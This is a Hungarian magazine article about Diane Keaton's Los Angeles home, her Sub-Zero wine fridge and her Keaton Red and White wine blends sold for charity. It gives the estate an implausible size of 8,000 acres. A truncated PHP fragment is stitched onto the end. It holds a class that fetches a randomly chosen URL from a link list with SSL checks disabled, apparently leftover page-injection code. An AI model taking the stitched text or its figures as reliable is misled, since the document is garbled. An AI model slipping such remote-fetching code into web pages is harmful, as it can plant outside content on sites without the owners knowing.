Diane Keaton álomháza a bor szerete köré épült

Az Annie Hall óta feledhetetlen Oscar és Golden Globe-díjas színésznő, Diane Keaton számára nincs fontosabb hely, mint az otthona, aminek minden részletét maga rendezte be, és amiben a bor szeretete kiemelkedő helyet kapott. Forrás: www.winespectator.com Keaton életében már gyerekkorában is különleges szerepet játszottak a házak és lakások – ingatlanügynök édesapjával együtt járta az eladásra kínált... Tovább..


Az Annie Hall óta feledhetetlen Oscar és Golden Globe-díjas színésznő, Diane Keaton számára nincs fontosabb hely, mint az otthona, aminek minden részletét maga rendezte be, és amiben a bor szeretete kiemelkedő helyet kapott.

Forrás: www.winespectator.com

Keaton életében már gyerekkorában is különleges szerepet játszottak a házak és lakások – ingatlanügynök édesapjával együtt járta az eladásra kínált otthonokat. Már a karrierje elején, 1980-ban megállapodott Los Angelesben, amit azóta is az otthonának tekint, a tökéletes házat viszont sokáig nem találta meg.

Legutóbbi projektje egy 8000 holdas birtok Los Angelesben egy téglaépülettel, ahol a 71 éves színésznő talán végre megállapodhat. Korábbi lakásainak kedvenc elemeit ötvözve Keaton nemcsak arra figyelt, hogy fényes, nyitott térben éljen, hanem borkedvelőként otthonában a bor tárolására is nagy figyelmet fordított.

Ez az első alkalom, hogy a színésznő Sub-Zero borhűtővel és egy hatalmas antik tálalószekrénnyel is adózott rajongásának. A konyhájában viszont csak saját márkájából, a kifejezetten neki készített borból tart palackokat, amiket kedvenc pohárfajtájából, lowball pohárból, jéggel hűtve fogyaszt.

A Keaton számára készített testre szabott italt Bruce Hunter, a Shaw-Ross Importers igazgatója és Robert Pepi borász alkották meg. A Keaton Red Zinfandel, Petite Shiraz és Shiraz borok testes keveréke, amit a 2014-es nemes évjárattal mutattak be. A Keaton White szintén keverék, amely 2016-os palackozással kezdett. Verdelho, Pinot Grigio és Riesling borok vegyülnek benne, melyekhez a Napa völgyben termelték a szőlőt. A merész borokat jégre töltve ajánlják, 15 dolláros üvegáron juthatnak hozzá az érdeklődők.

A borokból származó bevétel egy részével Keaton a Keep Memory Alive alapítványt támogatja, ezzel olyan betegségekkel segít felvenni a harcot, mint az Alzheimer-kór.

A színésznő azt is elmesélte, hogy minden este pontosan két pohárral fogyaszt kedvenc italaiból: “Körülményes vagyok az élet örömeivel kapcsolatban” – mondta.

Forrás: Wine Spectator


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>